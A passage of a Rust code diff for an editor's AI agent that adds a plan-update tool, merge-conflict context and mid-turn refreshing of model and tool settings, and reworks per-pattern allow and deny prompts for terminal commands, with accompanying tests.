+ acp::ToolCallUpdateFields::new().status(acp::ToolCallStatus::InProgress)
+ )
+ );
+
+ let plan = expect_plan(&mut events).await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "Inspect the code",
+ acp::PlanEntryPriority::High,
+ acp::PlanEntryStatus::Completed,
+ ),
+ acp::PlanEntry::new(
+ "Implement the tool",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Run tests",
+ acp::PlanEntryPriority::Low,
+ acp::PlanEntryStatus::Pending,
+ ),
+ ])
+ );
+
+ let update = expect_tool_call_update_fields(&mut events).await;
+ assert_eq!(
+ update,
+ acp::ToolCallUpdate::new(
+ "plan_1",
+ acp::ToolCallUpdateFields::new()
+ .status(acp::ToolCallStatus::Completed)
+ .raw_output("Plan updated")
+ )
+ );
+}
+
#[gpui::test]
async fn test_send_no_retry_on_success(cx: &mut TestAppContext) {
let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await;
@@ -3770,6 +3965,7 @@ async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest {
StreamingEchoTool::NAME: true,
StreamingFailingEchoTool::NAME: true,
TerminalTool::NAME: true,
+ UpdatePlanTool::NAME: true,
}
}
}
@@ -4388,23 +4584,16 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) {
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -4530,23 +4719,16 @@ async fn test_subagent_tool_output_does_not_include_thinking(cx: &mut TestAppCon
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -4685,23 +4867,16 @@ async fn test_subagent_tool_call_cancellation_during_task_prompt(cx: &mut TestAp
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -4822,23 +4997,16 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) {
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -4987,48 +5155,6 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) {
);
}
-#[gpui::test]
-async fn test_subagent_tool_is_present_when_feature_flag_enabled(cx: &mut TestAppContext) {
- init_test(cx);
-
- cx.update(|cx| {
- cx.update_flags(true, vec!["subagents".to_string()]);
- });
-
- let fs = FakeFs::new(cx.executor());
- fs.insert_tree(path!("/test"), json!({})).await;
- let project = Project::test(fs, [path!("/test").as_ref()], cx).await;
- let project_context = cx.new(|_cx| ProjectContext::default());
- let context_server_store = project.read_with(cx, |project, _| project.context_server_store());
- let context_server_registry =
- cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx));
- let model = Arc::new(FakeLanguageModel::default());
-
- let environment = Rc::new(cx.update(|cx| {
- FakeThreadEnvironment::default().with_terminal(FakeTerminalHandle::new_never_exits(cx))
- }));
-
- let thread = cx.new(|cx| {
- let mut thread = Thread::new(
- project.clone(),
- project_context,
- context_server_registry,
- Templates::new(),
- Some(model),
- cx,
- );
- thread.add_default_tools(environment, cx);
- thread
- });
-
- thread.read_with(cx, |thread, _| {
- assert!(
- thread.has_registered_tool(SpawnAgentTool::NAME),
- "subagent tool should be present when feature flag is enabled"
- );
- });
-}
-
#[gpui::test]
async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestAppContext) {
init_test(cx);
@@ -5201,23 +5327,16 @@ async fn test_subagent_context_window_warning(cx: &mut TestAppContext) {
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -5334,23 +5453,16 @@ async fn test_subagent_no_context_window_warning_when_already_at_warning(cx: &mu
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -5515,23 +5627,16 @@ async fn test_subagent_error_propagation(cx: &mut TestAppContext) {
.await;
let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store.clone(),
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx.update(|cx| {
+ NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx)
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = cx
.update(|cx| {
connection
.clone()
- .new_session(project.clone(), Path::new(""), cx)
+ .new_session(project.clone(), PathList::new(&[Path::new("")]), cx)
})
.await
.unwrap();
@@ -6529,3 +6634,110 @@ async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut Te
]
);
}
+
+#[gpui::test]
+async fn test_mid_turn_model_and_settings_refresh(cx: &mut TestAppContext) {
+ let ThreadTest {
+ model, thread, fs, ..
+ } = setup(cx, TestModel::Fake).await;
+ let fake_model_a = model.as_fake();
+
+ thread.update(cx, |thread, _cx| {
+ thread.add_tool(EchoTool);
+ thread.add_tool(DelayTool);
+ });
+
+ // Set up two profiles: profile-a has both tools, profile-b has only DelayTool.
+ fs.insert_file(
+ paths::settings_file(),
+ json!({
+ "agent": {
+ "profiles": {
+ "profile-a": {
+ "name": "Profile A",
+ "tools": {
+ EchoTool::NAME: true,
+ DelayTool::NAME: true,
+ }
+ },
+ "profile-b": {
+ "name": "Profile B",
+ "tools": {
+ DelayTool::NAME: true,
+ }
+ }
+ }
+ }
+ })
+ .to_string()
+ .into_bytes(),
+ )
+ .await;
+ cx.run_until_parked();
+
+ thread.update(cx, |thread, cx| {
+ thread.set_profile(AgentProfileId("profile-a".into()), cx);
+ thread.set_thinking_enabled(false, cx);
+ });
+
+ // Send a message — first iteration starts with model A, profile-a, thinking off.
+ thread
+ .update(cx, |thread, cx| {
+ thread.send(UserMessageId::new(), ["test mid-turn refresh"], cx)
+ })
+ .unwrap();
+ cx.run_until_parked();
+
+ // Verify first request has both tools and thinking disabled.
+ let completions = fake_model_a.pending_completions();
+ assert_eq!(completions.len(), 1);
+ let first_tools = tool_names_for_completion(&completions[0]);
+ assert_eq!(first_tools, vec![DelayTool::NAME, EchoTool::NAME]);
+ assert!(!completions[0].thinking_allowed);
+
+ // Model A responds with an echo tool call.
+ fake_model_a.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(
+ LanguageModelToolUse {
+ id: "tool_1".into(),
+ name: "echo".into(),
+ raw_input: r#"{"text":"hello"}"#.into(),
+ input: json!({"text": "hello"}),
+ is_input_complete: true,
+ thought_signature: None,
+ },
+ ));
+ fake_model_a.end_last_completion_stream();
+
+ // Before the next iteration runs, switch to profile-b (only DelayTool),
+ // swap in a new model, and enable thinking.
+ let fake_model_b = Arc::new(FakeLanguageModel::with_id_and_thinking(
+ "test-provider",
+ "model-b",
+ "Model B",
+ true,
+ ));
+ thread.update(cx, |thread, cx| {
+ thread.set_profile(AgentProfileId("profile-b".into()), cx);
+ thread.set_model(fake_model_b.clone() as Arc<dyn LanguageModel>, cx);
+ thread.set_thinking_enabled(true, cx);
+ });
+
+ // Run until parked — processes the echo tool call, loops back, picks up
+ // the new model/profile/thinking, and makes a second request to model B.
+ cx.run_until_parked();
+
+ // The second request should have gone to model B.
+ let model_b_completions = fake_model_b.pending_completions();
+ assert_eq!(
+ model_b_completions.len(),
+ 1,
+ "second request should go to model B"
+ );
+
+ // Profile-b only has DelayTool, so echo should be gone.
+ let second_tools = tool_names_for_completion(&model_b_completions[0]);
+ assert_eq!(second_tools, vec![DelayTool::NAME]);
+
+ // Thinking should now be enabled.
+ assert!(model_b_completions[0].thinking_allowed);
+}
@@ -3,17 +3,18 @@ use crate::{
DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool,
ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool,
RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool,
- SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, WebSearchTool,
- decide_permission_from_settings,
+ SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision,
+ UpdatePlanTool, WebSearchTool, decide_permission_from_settings,
};
use acp_thread::{MentionUri, UserMessageId};
use action_log::ActionLog;
-use feature_flags::{FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag};
+use feature_flags::{
+ FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag,
+};
use agent_client_protocol as acp;
use agent_settings::{
- AgentProfileId, AgentProfileSettings, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT,
- SUMMARIZE_THREAD_PROMPT,
+ AgentProfileId, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, SUMMARIZE_THREAD_PROMPT,
};
use anyhow::{Context as _, Result, anyhow};
use chrono::{DateTime, Utc};
@@ -219,6 +220,7 @@ impl UserMessage {
"<rules>\nThe user has specified the following rules that should be applied:\n";
const OPEN_DIAGNOSTICS_TAG: &str = "<diagnostics>";
const OPEN_DIFFS_TAG: &str = "<diffs>";
+ const MERGE_CONFLICT_TAG: &str = "<merge_conflicts>";
let mut file_context = OPEN_FILES_TAG.to_string();
let mut directory_context = OPEN_DIRECTORIES_TAG.to_string();
@@ -229,6 +231,7 @@ impl UserMessage {
let mut rules_context = OPEN_RULES_TAG.to_string();
let mut diagnostics_context = OPEN_DIAGNOSTICS_TAG.to_string();
let mut diffs_context = OPEN_DIFFS_TAG.to_string();
+ let mut merge_conflict_context = MERGE_CONFLICT_TAG.to_string();
for chunk in &self.content {
let chunk = match chunk {
@@ -336,6 +339,18 @@ impl UserMessage {
)
.ok();
}
+ MentionUri::MergeConflict { file_path } => {
+ write!(
+ &mut merge_conflict_context,
+ "\nMerge conflict in {}:\n{}",
+ file_path,
+ MarkdownCodeBlock {
+ tag: "diff",
+ text: content
+ }
+ )
+ .ok();
+ }
}
language_model::MessageContent::Text(uri.as_link().to_string())
@@ -410,6 +425,13 @@ impl UserMessage {
.push(language_model::MessageContent::Text(diagnostics_context));
}
+ if merge_conflict_context.len() > MERGE_CONFLICT_TAG.len() {
+ merge_conflict_context.push_str("</merge_conflicts>\n");
+ message
+ .content
+ .push(language_model::MessageContent::Text(merge_conflict_context));
+ }
+
if message.content.len() > len_before_context {
message.content.insert(
len_before_context,
@@ -641,6 +663,7 @@ pub enum ThreadEvent {
AgentThinking(String),
ToolCall(acp::ToolCall),
ToolCallUpdate(acp_thread::ToolCallUpdate),
+ Plan(acp::Plan),
ToolCallAuthorization(ToolCallAuthorization),
SubagentSpawned(acp::SessionId),
Retry(acp_thread::RetryStatus),
@@ -738,6 +761,48 @@ impl ToolPermissionContext {
true
};
+ // For terminal commands with multiple pipeline commands, use DropdownWithPatterns
+ // to let users individually select which command patterns to always allow.
+ if tool_name == TerminalTool::NAME && shell_supports_always_allow {
+ if let Some(input) = input_values.first() {
+ let all_patterns = extract_all_terminal_patterns(input);
+ if all_patterns.len() > 1 {
+ let mut choices = Vec::new();
+ choices.push(acp_thread::PermissionOptionChoice {
+ allow: acp::PermissionOption::new(
+ acp::PermissionOptionId::new(format!("always_allow:{}", tool_name)),
+ format!("Always for {}", tool_name.replace('_', " ")),
+ acp::PermissionOptionKind::AllowAlways,
+ ),
+ deny: acp::PermissionOption::new(
+ acp::PermissionOptionId::new(format!("always_deny:{}", tool_name)),
+ format!("Always for {}", tool_name.replace('_', " ")),
+ acp::PermissionOptionKind::RejectAlways,
+ ),
+ sub_patterns: vec![],
+ });
+ choices.push(acp_thread::PermissionOptionChoice {
+ allow: acp::PermissionOption::new(
+ acp::PermissionOptionId::new("allow"),
+ "Only this time",
+ acp::PermissionOptionKind::AllowOnce,
+ ),
+ deny: acp::PermissionOption::new(
+ acp::PermissionOptionId::new("deny"),
+ "Only this time",
+ acp::PermissionOptionKind::RejectOnce,
+ ),
+ sub_patterns: vec![],
+ });
+ return acp_thread::PermissionOptions::DropdownWithPatterns {
+ choices,
+ patterns: all_patterns,
+ tool_name: tool_name.clone(),
+ };
+ }
+ }
+ }
+
let extract_for_value = |value: &str| -> (Option<String>, Option<String>) {
if tool_name == TerminalTool::NAME {
(
@@ -786,20 +851,22 @@ impl ToolPermissionContext {
let mut choices = Vec::new();
- let mut push_choice = |label: String, allow_id, deny_id, allow_kind, deny_kind| {
- choices.push(acp_thread::PermissionOptionChoice {
- allow: acp::PermissionOption::new(
- acp::PermissionOptionId::new(allow_id),
- label.clone(),
- allow_kind,
- ),
- deny: acp::PermissionOption::new(
- acp::PermissionOptionId::new(deny_id),
- label,
- deny_kind,
- ),
- });
- };
+ let mut push_choice =
+ |label: String, allow_id, deny_id, allow_kind, deny_kind, sub_patterns: Vec<String>| {
+ choices.push(acp_thread::PermissionOptionChoice {
+ allow: acp::PermissionOption::new(
+ acp::PermissionOptionId::new(allow_id),
+ label.clone(),
+ allow_kind,
+ ),
+ deny: acp::PermissionOption::new(
+ acp::PermissionOptionId::new(deny_id),
+ label,
+ deny_kind,
+ ),
+ sub_patterns,
+ });
+ };
if shell_supports_always_allow {
push_choice(
@@ -808,6 +875,7 @@ impl ToolPermissionContext {
format!("always_deny:{}", tool_name),
acp::PermissionOptionKind::AllowAlways,
acp::PermissionOptionKind::RejectAlways,
+ vec![],
);
if let (Some(pattern), Some(display)) = (pattern, pattern_display) {
@@ -818,10 +886,11 @@ impl ToolPermissionContext {
};
push_choice(
button_text,
- format!("always_allow_pattern:{}\n{}", tool_name, pattern),
- format!("always_deny_pattern:{}\n{}", tool_name, pattern),
+ format!("always_allow:{}", tool_name),
+ format!("always_deny:{}", tool_name),
acp::PermissionOptionKind::AllowAlways,
acp::PermissionOptionKind::RejectAlways,
+ vec![pattern],
);
}
}
@@ -832,6 +901,7 @@ impl ToolPermissionContext {
"deny".to_string(),
acp::PermissionOptionKind::AllowOnce,
acp::PermissionOptionKind::RejectOnce,
+ vec![],
);
acp_thread::PermissionOptions::Dropdown(choices)
@@ -842,7 +912,7 @@ impl ToolPermissionContext {
pub struct ToolCallAuthorization {
pub tool_call: acp::ToolCallUpdate,
pub options: acp_thread::PermissionOptions,
- pub response: oneshot::Sender<acp::PermissionOptionId>,
+ pub response: oneshot::Sender<acp_thread::SelectedPermissionOutcome>,
pub context: Option<ToolPermissionContext>,
}
@@ -1242,7 +1312,7 @@ impl Thread {
pub fn to_db(&self, cx: &App) -> Task<DbThread> {
let initial_project_snapshot = self.initial_project_snapshot.clone();
let mut thread = DbThread {
- title: self.title(),
+ title: self.title().unwrap_or_default(),
messages: self.messages.clone(),
updated_at: self.updated_at,
detailed_summary: self.summary.clone(),
@@ -1462,6 +1532,9 @@ impl Thread {
self.add_tool(MovePathTool::new(self.project.clone()));
self.add_tool(NowTool);
self.add_tool(OpenTool::new(self.project.clone()));
+ if cx.has_flag::<UpdatePlanToolFeatureFlag>() {
+ self.add_tool(UpdatePlanTool);
+ }
self.add_tool(ReadFileTool::new(
self.project.clone(),
self.action_log.clone(),
@@ -1750,11 +1823,6 @@ impl Thread {
self.flush_pending_message(cx);
self.cancel(cx).detach();
- let model = self.model.clone().context("No language model configured")?;
- let profile = AgentSettings::get_global(cx)
- .profiles
- .get(&self.profile_id)
- .context("Profile not found")?;
let (events_tx, events_rx) = mpsc::unbounded::<Result<ThreadEvent>>();
let event_stream = ThreadEventStream(events_tx);
let message_ix = self.messages.len().saturating_sub(1);
@@ -1762,20 +1830,15 @@ impl Thread {
let (cancellation_tx, mut cancellation_rx) = watch::channel(false);
self.running_turn = Some(RunningTurn {
event_stream: event_stream.clone(),
- tools: self.enabled_tools(profile, &model, cx),
+ tools: self.enabled_tools(cx),
cancellation_tx,
streaming_tool_inputs: HashMap::default(),
_task: cx.spawn(async move |this, cx| {
log::debug!("Starting agent turn execution");
- let turn_result = Self::run_turn_internal(
- &this,
- model,
- &event_stream,
- cancellation_rx.clone(),
- cx,
- )
- .await;
+ let turn_result =
+ Self::run_turn_internal(&this, &event_stream, cancellation_rx.clone(), cx)
+ .await;
// Check if we were cancelled - if so, cancel() already took running_turn
// and we shouldn't touch it (it might be a NEW turn now)
@@ -1817,7 +1880,6 @@ impl Thread {
async fn run_turn_internal(
this: &WeakEntity<Self>,
- model: Arc<dyn LanguageModel>,
event_stream: &ThreadEventStream,
mut cancellation_rx: watch::Receiver<bool>,
cx: &mut AsyncApp,
@@ -1825,8 +1887,15 @@ impl Thread {
let mut attempt = 0;
let mut intent = CompletionIntent::UserPrompt;
loop {
- let request =
- this.update(cx, |this, cx| this.build_completion_request(intent, cx))??;
+ // Re-read the model and refresh tools on each iteration so that
+ // mid-turn changes (e.g. the user switches model, toggles tools,
+ // or changes profile) take effect between tool-call rounds.
+ let (model, request) = this.update(cx, |this, cx| {
+ let model = this.model.clone().context("No language model configured")?;
+ this.refresh_turn_tools(cx);
+ let request = this.build_completion_request(intent, cx)?;
+ anyhow::Ok((model, request))
+ })??;
telemetry::event!(
"Agent Thread Completion",
@@ -2422,8 +2491,8 @@ impl Thread {
}
}
- pub fn title(&self) -> SharedString {
- self.title.clone().unwrap_or("New Thread".into())
+ pub fn title(&self) -> Option<SharedString> {
+ self.title.clone()
}
pub fn is_generating_summary(&self) -> bool {
@@ -2549,6 +2618,14 @@ impl Thread {
.is_some()
{
_ = this.update(cx, |this, cx| this.set_title(title.into(), cx));
+ } else {
+ // Emit TitleUpdated even on failure so that the propagation
+ // chain (agent::Thread → NativeAgent → AcpThread) fires and
+ // clears any provisional title that was set before the turn.
+ _ = this.update(cx, |_, cx| {
+ cx.emit(TitleUpdated);
+ cx.notify();
+ });
}
_ = this.update(cx, |this, _| this.pending_title_generation = None);
}));
@@ -2671,12 +2748,13 @@ impl Thread {
Ok(request)
}
- fn enabled_tools(
- &self,
- profile: &AgentProfileSettings,
- model: &Arc<dyn LanguageModel>,
- cx: &App,
- ) -> BTreeMap<SharedString, Arc<dyn AnyAgentTool>> {
+ fn enabled_tools(&self, cx: &App) -> BTreeMap<SharedString, Arc<dyn AnyAgentTool>> {
+ let Some(model) = self.model.as_ref() else {
+ return BTreeMap::new();
+ };
+ let Some(profile) = AgentSettings::get_global(cx).profiles.get(&self.profile_id) else {
+ return BTreeMap::new();
+ };
fn truncate(tool_name: &SharedString) -> SharedString {
if tool_name.len() > MAX_TOOL_NAME_LENGTH {
let mut truncated = tool_name.to_string();
@@ -2757,6 +2835,13 @@ impl Thread {
tools
}
+ fn refresh_turn_tools(&mut self, cx: &App) {
+ let tools = self.enabled_tools(cx);
+ if let Some(turn) = self.running_turn.as_mut() {
+ turn.tools = tools;
+ }
+ }
+
fn tool(&self, name: &str) -> Option<Arc<dyn AnyAgentTool>> {
self.running_turn.as_ref()?.tools.get(name).cloned()
}
@@ -3000,7 +3085,8 @@ struct RunningTurn {
/// The current event stream for the running turn. Used to report a final
/// cancellation event if we cancel the turn.
event_stream: ThreadEventStream,
- /// The tools that were enabled for this turn.
+ /// The tools that are enabled for the current iteration of the turn.
+ /// Refreshed at the start of each iteration via `refresh_turn_tools`.
tools: BTreeMap<SharedString, Arc<dyn AnyAgentTool>>,
/// Sender to signal tool cancellation. When cancel is called, this is
/// set to true so all tools can detect user-initiated cancellation.
@@ -3396,6 +3482,10 @@ impl ThreadEventStream {
.ok();
}
+ fn send_plan(&self, plan: acp::Plan) {
+ self.0.unbounded_send(Ok(ThreadEvent::Plan(plan))).ok();
+ }
+
fn send_retry(&self, status: acp_thread::RetryStatus) {
self.0.unbounded_send(Ok(ThreadEvent::Retry(status))).ok();
}
@@ -3531,6 +3621,10 @@ impl ToolCallEventStream {
.ok();
}
+ pub fn update_plan(&self, plan: acp::Plan) {
+ self.stream.send_plan(plan);
+ }
+
/// Authorize a third-party tool (e.g., MCP tool from a context server).
///
/// Unlike built-in tools, third-party tools don't support pattern-based permissions.
@@ -3584,6 +3678,7 @@ impl ToolCallEventStream {
format!("Always for {} MCP tool", display_name),
acp::PermissionOptionKind::RejectAlways,
),
+ sub_patterns: vec![],
},
acp_thread::PermissionOptionChoice {
allow: acp::PermissionOption::new(
@@ -3596,6 +3691,7 @@ impl ToolCallEventStream {
"Only this time",
acp::PermissionOptionKind::RejectOnce,
),
+ sub_patterns: vec![],
},
]),
response: response_tx,
@@ -3611,40 +3707,13 @@ impl ToolCallEventStream {
let fs = self.fs.clone();
cx.spawn(async move |cx| {
- let response_str = response_rx.await?.0.to_string();
-
- if response_str == format!("always_allow_mcp:{}", tool_id) {
- if let Some(fs) = fs.clone() {
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .set_tool_default_permission(&tool_id, ToolPermissionMode::Allow);
- });
- });
- }
- return Ok(());
- }
- if response_str == format!("always_deny_mcp:{}", tool_id) {
- if let Some(fs) = fs.clone() {
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .set_tool_default_permission(&tool_id, ToolPermissionMode::Deny);
- });
- });
- }
- return Err(anyhow!("Permission to run tool denied by user"));
- }
-
- if response_str == "allow" {
- return Ok(());
+ let outcome = response_rx.await?;
+ let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx);
+ if is_allow {
+ Ok(())
+ } else {
+ Err(anyhow!("Permission to run tool denied by user"))
}
-
- Err(anyhow!("Permission to run tool denied by user"))
})
}
@@ -3654,8 +3723,6 @@ impl ToolCallEventStream {
context: ToolPermissionContext,
cx: &mut App,
) -> Task<Result<()>> {
- use settings::ToolPermissionMode;
-
let options = context.build_permission_options();
let (response_tx, response_rx) = oneshot::channel();
@@ -3682,90 +3749,118 @@ impl ToolCallEventStream {
let fs = self.fs.clone();
cx.spawn(async move |cx| {
- let response_str = response_rx.await?.0.to_string();
-
- // Handle "always allow tool" - e.g., "always_allow:terminal"
- if let Some(tool) = response_str.strip_prefix("always_allow:") {
- if let Some(fs) = fs.clone() {
- let tool = tool.to_string();
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .set_tool_default_permission(&tool, ToolPermissionMode::Allow);
- });
- });
- }
- return Ok(());
+ let outcome = response_rx.await?;
+ let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx);
+ if is_allow {
+ Ok(())
+ } else {
+ Err(anyhow!("Permission to run tool denied by user"))
}
+ })
+ }
- // Handle "always deny tool" - e.g., "always_deny:terminal"
- if let Some(tool) = response_str.strip_prefix("always_deny:") {
- if let Some(fs) = fs.clone() {
- let tool = tool.to_string();
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .set_tool_default_permission(&tool, ToolPermissionMode::Deny);
- });
- });
- }
- return Err(anyhow!("Permission to run tool denied by user"));
- }
+ /// Interprets a `SelectedPermissionOutcome` and persists any settings changes.
+ /// Returns `true` if the tool call should be allowed, `false` if denied.
+ fn persist_permission_outcome(
+ outcome: &acp_thread::SelectedPermissionOutcome,
+ fs: Option<Arc<dyn Fs>>,
+ cx: &AsyncApp,
+ ) -> bool {
+ let option_id = outcome.option_id.0.as_ref();
+
+ let always_permission = option_id
+ .strip_prefix("always_allow:")
+ .map(|tool| (tool, ToolPermissionMode::Allow))
+ .or_else(|| {
+ option_id
+ .strip_prefix("always_deny:")
+ .map(|tool| (tool, ToolPermissionMode::Deny))
+ })
+ .or_else(|| {
+ option_id
+ .strip_prefix("always_allow_mcp:")
+ .map(|tool| (tool, ToolPermissionMode::Allow))
+ })
+ .or_else(|| {
+ option_id
+ .strip_prefix("always_deny_mcp:")
+ .map(|tool| (tool, ToolPermissionMode::Deny))
+ });
- // Handle "always allow pattern" - e.g., "always_allow_pattern:mcp:server:tool\n^cargo\s"
- if let Some(rest) = response_str.strip_prefix("always_allow_pattern:") {
- if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') {
- let pattern_tool_name = pattern_tool_name.to_string();
- let pattern = pattern.to_string();
- if let Some(fs) = fs.clone() {
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .add_tool_allow_pattern(&pattern_tool_name, pattern);
- });
- });
- }
- } else {
- log::error!("Failed to parse always allow pattern: missing newline separator in '{rest}'");
- }
- return Ok(());
- }
+ if let Some((tool, mode)) = always_permission {
+ let params = outcome.params.as_ref();
+ Self::persist_always_permission(tool, mode, params, fs, cx);
+ return mode == ToolPermissionMode::Allow;
+ }
- // Handle "always deny pattern" - e.g., "always_deny_pattern:mcp:server:tool\n^cargo\s"
- if let Some(rest) = response_str.strip_prefix("always_deny_pattern:") {
- if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') {
- let pattern_tool_name = pattern_tool_name.to_string();
- let pattern = pattern.to_string();
- if let Some(fs) = fs.clone() {
- cx.update(|cx| {
- update_settings_file(fs, cx, move |settings, _| {
- settings
- .agent
- .get_or_insert_default()
- .add_tool_deny_pattern(&pattern_tool_name, pattern);
- });
- });
- }
- } else {
- log::error!("Failed to parse always deny pattern: missing newline separator in '{rest}'");
- }
- return Err(anyhow!("Permission to run tool denied by user"));
- }
+ // Handle simple "allow" / "deny" (once, no persistence)
+ if option_id == "allow" || option_id == "deny" {
+ debug_assert!(
+ outcome.params.is_none(),
+ "unexpected params for once-only permission"
+ );
+ return option_id == "allow";
+ }
- // Handle simple "allow" (allow once)
- if response_str == "allow" {
- return Ok(());
- }
+ debug_assert!(false, "unexpected permission option_id: {option_id}");
+ false
+ }
- // Handle simple "deny" (deny once)
- Err(anyhow!("Permission to run tool denied by user"))
- })
+ /// Persists an "always allow" or "always deny" permission, using sub_patterns
+ /// from params when present.
+ fn persist_always_permission(
+ tool: &str,
+ mode: ToolPermissionMode,
+ params: Option<&acp_thread::SelectedPermissionParams>,
+ fs: Option<Arc<dyn Fs>>,
+ cx: &AsyncApp,
+ ) {
+ let Some(fs) = fs else {
+ return;
+ };
+
+ match params {
+ Some(acp_thread::SelectedPermissionParams::Terminal {
+ patterns: sub_patterns,
+ }) => {
+ debug_assert!(
+ !sub_patterns.is_empty(),
+ "empty sub_patterns for tool {tool} — callers should pass None instead"
+ );
+ let tool = tool.to_string();
+ let sub_patterns = sub_patterns.clone();
+ cx.update(|cx| {
+ update_settings_file(fs, cx, move |settings, _| {
